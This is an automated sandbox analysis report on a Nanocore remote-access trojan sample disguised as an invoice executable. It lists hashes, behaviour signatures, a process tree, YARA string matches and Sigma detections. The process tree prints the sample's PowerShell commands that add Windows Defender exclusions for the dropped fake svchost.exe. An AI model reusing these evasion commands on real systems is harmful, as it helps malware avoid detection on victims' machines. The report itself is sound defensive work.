Play interactive tour

Edit tour

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Sample Name:	CN-Invoice-XXXXX9808-19011143287989.exe
Analysis ID:	355908
MD5:	379482795da0042d0070e6ae599a369b
SHA1:	baf26cfe3c8ba84fc3da7cc2da74741130f2bb21
SHA256:	7d862f96808968bbe9ca5bf571335f86cd100faa6d131a1e148ef8c54f5a4eed
Tags:	exeFedEx
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected Nanocore RAT

Adds a directory exclusion to Windows Defender

Binary contains a suspicious time stamp

Creates an autostart registry key pointing to binary in C:\Windows

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Executable has a suspicious name (potential lure to open the executable)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Suspicious Svchost Process

Sigma detected: System File Execution Location Anomaly

Tries to delay execution (extensive OutputDebugStringW loop)

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

CN-Invoice-XXXXX9808-19011143287989.exe (PID: 7164 cmdline: 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' MD5: 379482795DA0042D0070E6AE599A369B)

powershell.exe (PID: 7088 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AdvancedRun.exe (PID: 5956 cmdline: 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 7092 cmdline: 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

powershell.exe (PID: 4488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6748 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5992 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

svchost.exe (PID: 6988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6292 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4984 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

explorer.exe (PID: 6680 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 5988 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 1284 cmdline: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' MD5: 379482795DA0042D0070E6AE599A369B)

explorer.exe (PID: 5320 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 5552 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 3980 cmdline: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' MD5: 379482795DA0042D0070E6AE599A369B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10f75:$x1: NanoCore.ClientPluginHost 0x43d95:$x1: NanoCore.ClientPluginHost 0x10fb2:$x2: IClientNetworkHost 0x43dd2:$x2: IClientNetworkHost 0x14ae5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47905:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10cdd:$a: NanoCore 0x10ced:$a: NanoCore 0x10f21:$a: NanoCore 0x10f35:$a: NanoCore 0x10f75:$a: NanoCore 0x43afd:$a: NanoCore 0x43b0d:$a: NanoCore 0x43d41:$a: NanoCore 0x43d55:$a: NanoCore 0x43d95:$a: NanoCore 0x10d3c:$b: ClientPlugin 0x10f3e:$b: ClientPlugin 0x10f7e:$b: ClientPlugin 0x43b5c:$b: ClientPlugin 0x43d5e:$b: ClientPlugin 0x43d9e:$b: ClientPlugin 0x10e63:$c: ProjectData 0x43c83:$c: ProjectData 0x1186a:$d: DESCrypto 0x4468a:$d: DESCrypto 0x19236:$e: KeepAlive
00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x36cc2d:$x1: NanoCore.ClientPluginHost 0x39fa4d:$x1: NanoCore.ClientPluginHost 0x36cc6a:$x2: IClientNetworkHost 0x39fa8a:$x2: IClientNetworkHost 0x37079d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3a35bd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x36c995:$a: NanoCore 0x36c9a5:$a: NanoCore 0x36cbd9:$a: NanoCore 0x36cbed:$a: NanoCore 0x36cc2d:$a: NanoCore 0x39f7b5:$a: NanoCore 0x39f7c5:$a: NanoCore 0x39f9f9:$a: NanoCore 0x39fa0d:$a: NanoCore 0x39fa4d:$a: NanoCore 0x36c9f4:$b: ClientPlugin 0x36cbf6:$b: ClientPlugin 0x36cc36:$b: ClientPlugin 0x39f814:$b: ClientPlugin 0x39fa16:$b: ClientPlugin 0x39fa56:$b: ClientPlugin 0x36cb1b:$c: ProjectData 0x39f93b:$c: ProjectData 0x36d522:$d: DESCrypto 0x3a0342:$d: DESCrypto 0x374eee:$e: KeepAlive
Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x153611d:$x1: NanoCore.ClientPluginHost 0x155505b:$x1: NanoCore.ClientPluginHost 0x153617e:$x2: IClientNetworkHost 0x15550bc:$x2: IClientNetworkHost 0x153b583:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x15494f5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x155a4c1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1568433:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1535c22:$a: NanoCore 0x1535c3e:$a: NanoCore 0x1535d99:$a: NanoCore 0x1535da8:$a: NanoCore 0x1536081:$a: NanoCore 0x15360ad:$a: NanoCore 0x153611d:$a: NanoCore 0x1545b5f:$a: NanoCore 0x1545b71:$a: NanoCore 0x1545bad:$a: NanoCore 0x1554b60:$a: NanoCore 0x1554b7c:$a: NanoCore 0x1554cd7:$a: NanoCore 0x1554ce6:$a: NanoCore 0x1554fbf:$a: NanoCore 0x1554feb:$a: NanoCore 0x155505b:$a: NanoCore 0x1564a9d:$a: NanoCore 0x1564aaf:$a: NanoCore 0x1564aeb:$a: NanoCore 0x1535cc9:$b: ClientPlugin
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4e3ad:$x1: NanoCore.ClientPluginHost 0x811cd:$x1: NanoCore.ClientPluginHost 0x4e3ea:$x2: IClientNetworkHost 0x8120a:$x2: IClientNetworkHost 0x51f1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x84d3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4e115:$a: NanoCore 0x4e125:$a: NanoCore 0x4e359:$a: NanoCore 0x4e36d:$a: NanoCore 0x4e3ad:$a: NanoCore 0x80f35:$a: NanoCore 0x80f45:$a: NanoCore 0x81179:$a: NanoCore 0x8118d:$a: NanoCore 0x811cd:$a: NanoCore 0x4e174:$b: ClientPlugin 0x4e376:$b: ClientPlugin 0x4e3b6:$b: ClientPlugin 0x80f94:$b: ClientPlugin 0x81196:$b: ClientPlugin 0x811d6:$b: ClientPlugin 0x4e29b:$c: ProjectData 0x810bb:$c: ProjectData 0x4eca2:$d: DESCrypto 0x81ac2:$d: DESCrypto 0x5666e:$e: KeepAlive
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x501ad:$x1: NanoCore.ClientPluginHost 0x82fcd:$x1: NanoCore.ClientPluginHost 0x501ea:$x2: IClientNetworkHost 0x8300a:$x2: IClientNetworkHost 0x53d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x86b3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4ff15:$a: NanoCore 0x4ff25:$a: NanoCore 0x50159:$a: NanoCore 0x5016d:$a: NanoCore 0x501ad:$a: NanoCore 0x82d35:$a: NanoCore 0x82d45:$a: NanoCore 0x82f79:$a: NanoCore 0x82f8d:$a: NanoCore 0x82fcd:$a: NanoCore 0x4ff74:$b: ClientPlugin 0x50176:$b: ClientPlugin 0x501b6:$b: ClientPlugin 0x82d94:$b: ClientPlugin 0x82f96:$b: ClientPlugin 0x82fd6:$b: ClientPlugin 0x5009b:$c: ProjectData 0x82ebb:$c: ProjectData 0x50aa2:$d: DESCrypto 0x838c2:$d: DESCrypto 0x5846e:$e: KeepAlive
22.2.svchost.exe.3da9c08.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.svchost.exe.3da9c08.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
22.2.svchost.exe.3da9c08.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.3da9c08.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
22.2.svchost.exe.3d76de8.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.svchost.exe.3d76de8.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
22.2.svchost.exe.3d76de8.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.3d76de8.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42fad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42fea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42d15:$a: NanoCore 0x42d25:$a: NanoCore 0x42f59:$a: NanoCore 0x42f6d:$a: NanoCore 0x42fad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42d74:$b: ClientPlugin 0x42f76:$b: ClientPlugin 0x42fb6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42e9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x438a2:$d: DESCrypto 0x1844e:$e: KeepAlive
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6e3cd:$x1: NanoCore.ClientPluginHost 0xa11ed:$x1: NanoCore.ClientPluginHost 0x6e40a:$x2: IClientNetworkHost 0xa122a:$x2: IClientNetworkHost 0x71f3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xa4d5d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6e135:$a: NanoCore 0x6e145:$a: NanoCore 0x6e379:$a: NanoCore 0x6e38d:$a: NanoCore 0x6e3cd:$a: NanoCore 0xa0f55:$a: NanoCore 0xa0f65:$a: NanoCore 0xa1199:$a: NanoCore 0xa11ad:$a: NanoCore 0xa11ed:$a: NanoCore 0x6e194:$b: ClientPlugin 0x6e396:$b: ClientPlugin 0x6e3d6:$b: ClientPlugin 0xa0fb4:$b: ClientPlugin 0xa11b6:$b: ClientPlugin 0xa11f6:$b: ClientPlugin 0x6e2bb:$c: ProjectData 0xa10db:$c: ProjectData 0x6ecc2:$d: DESCrypto 0xa1ae2:$d: DESCrypto 0x7668e:$e: KeepAlive
22.2.svchost.exe.3da9c08.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.svchost.exe.3da9c08.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.3da9c08.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x701cd:$x1: NanoCore.ClientPluginHost 0xa2fed:$x1: NanoCore.ClientPluginHost 0x7020a:$x2: IClientNetworkHost 0xa302a:$x2: IClientNetworkHost 0x73d3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xa6b5d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x6ff35:$a: NanoCore 0x6ff45:$a: NanoCore 0x70179:$a: NanoCore 0x7018d:$a: NanoCore 0x701cd:$a: NanoCore 0xa2d55:$a: NanoCore 0xa2d65:$a: NanoCore 0xa2f99:$a: NanoCore 0xa2fad:$a: NanoCore 0xa2fed:$a: NanoCore 0x6ff94:$b: ClientPlugin 0x70196:$b: ClientPlugin 0x701d6:$b: ClientPlugin 0xa2db4:$b: ClientPlugin 0xa2fb6:$b: ClientPlugin 0xa2ff6:$b: ClientPlugin 0x700bb:$c: ProjectData 0xa2edb:$c: ProjectData 0x70ac2:$d: DESCrypto 0xa38e2:$d: DESCrypto 0x7848e:$e: KeepAlive
22.2.svchost.exe.3d76de8.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42fad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42fea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.svchost.exe.3d76de8.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.svchost.exe.3d76de8.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42d15:$a: NanoCore 0x42d25:$a: NanoCore 0x42f59:$a: NanoCore 0x42f6d:$a: NanoCore 0x42fad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42d74:$b: ClientPlugin 0x42f76:$b: ClientPlugin 0x42fb6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42e9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x438a2:$d: DESCrypto 0x1844e:$e: KeepAlive
Click to see the 28 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5988, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , ProcessId: 1284

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5988, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' , ProcessId: 1284

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

